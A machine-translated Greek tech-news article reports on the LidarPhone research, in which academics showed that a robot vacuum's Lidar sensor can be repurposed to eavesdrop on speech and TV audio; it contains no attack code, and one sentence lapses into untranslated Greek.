Could your robotic broom be watching you?

A team of researchers has shown that popular robotic household vacuum cleaners can be tampered with remotely, and act as microphones.

Researchers tested the navigation system of a popular robotic vacuum cleaner, which is based on a laser and applying various techniques signal they were able to receive and hear the speech in the room and identify the sound of the TV playing in the same room at the time.

Research shows that any device using Lidar = LIight Detection And Ranging technology can be manipulated to collect sounds, even though it does not have a microphone. This work, which is a collaboration with Assistant Professor Jun Han at the University of Singapore and Nirupam Roy, Assistant Professor in the Department of Computer Science, University of Maryland, was presented at the Conference of the Association for Computing Machinery for Integrated Networked Sensor Systems (SenSys 2020) on 18 November 2020.

Commenting on his research, Nirupam Roy said: "We bring these devices into our homes and we do not think about it. However, we have shown that although these devices do not have microphones, we can reuse the systems they have for navigation, to spy on conversations and possibly reveal private information.

Lidar navigation systems in home vacuum robots emit a laser beam around a room and sense the laser reflection as it bounces off nearby objects. Robots use reflected signals to map the room and avoid collisions as they move through the house.

Security researchers have reported that maps created by the robotic broom, which are often stored in the cloud, create potential breaches of privacy that could give malicious access to information about interesting things, such as the size of the house, which suggests income level and other lifestyle-related information. Roy and his team wondered if Lidar could also pose potential security risks to these robots, such as audio recorders in users' homes or businesses.

Sound waves vibrate objects, and these vibrations cause small fluctuations in the light that bounces off an object. Laser microphones, used in espionage since the 1940s, are capable of converting these variations into sound waves. However, laser microphones are based on a targeted laser beam that reflects on very smooth surfaces, such as glass windows.

A Lidar vacuum cleaner, on the other hand, scans the environment with a laser and senses light scattering behind objects that are irregular in shape and density. The scattered signal received from the vacuum sensor provides only a small part of the information needed to recover sound waves. The researchers were unsure if a Lidar system of a robotic vacuum cleaner could be manipulated to function as a microphone and if the signal could be interpreted and converted into audio signals.

First, the researchers broke a robot broom to show that they could control the location of the laser beam and send the data from its sensors to their laptops via Wi-Fi without interfering with the device's navigation.

They then experimented with two audio sources. One source was human voice speech played through computer speakers and the other was audio from a variety of TV shows played through a television. Roy and his colleagues then captured the laser signal detected by the vacuum cleaner navigation system as it bounced off various objects located near the sound source. Items included a trash can, a cardboard box, a transport container, and a polypropylene bag, items typically found on a standard floor.

The researchers passed the signals they received through AI algorithms that were trained to either match human voices or detect music sequences from television shows. Their computer system, which they call LidarPhone, identified and matched the sounds with 90% accuracy. He also identified TV shows after one minute of recording, with an accuracy of over 90%.

The researchers point out that electric robotic vacuum cleaners are just one example of a potential vulnerability to Lidar-based spying. Many other devices could be open to similar attacks, such as one's infrared sensors που χρησιμοποιούνται για αναγνώριση προσώπου ή οι παθητικοί αισθητήρες υπερύθρων που χρησιμοποιούνται για ανίχνευση s.

"I believe this is important research that will make manufacturers aware of these features and push the security and privacy community to find solutions to prevent such attacks," Roy said.

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.087 registrants.

Written by Dimitris

Dimitris hates on Mondays .....

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).